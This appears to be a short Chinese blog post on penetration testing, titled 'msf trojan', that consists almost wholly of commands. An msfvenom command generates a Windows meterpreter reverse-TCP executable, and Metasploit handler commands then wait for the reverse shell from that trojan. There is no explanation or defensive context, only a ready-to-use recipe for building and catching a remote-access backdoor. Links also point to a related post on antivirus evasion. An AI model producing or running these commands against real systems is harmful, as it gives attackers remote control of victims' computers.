msf木马
Published in:2024-02-26 | category: 渗透测试 msf
1
2
3
4
5
6
7

root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.44.128 LPORT=4444 -f exe > shell.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.44.128
set lport 4444
exploit
Prev:
Linux操作学习
Next:
简单的免杀学习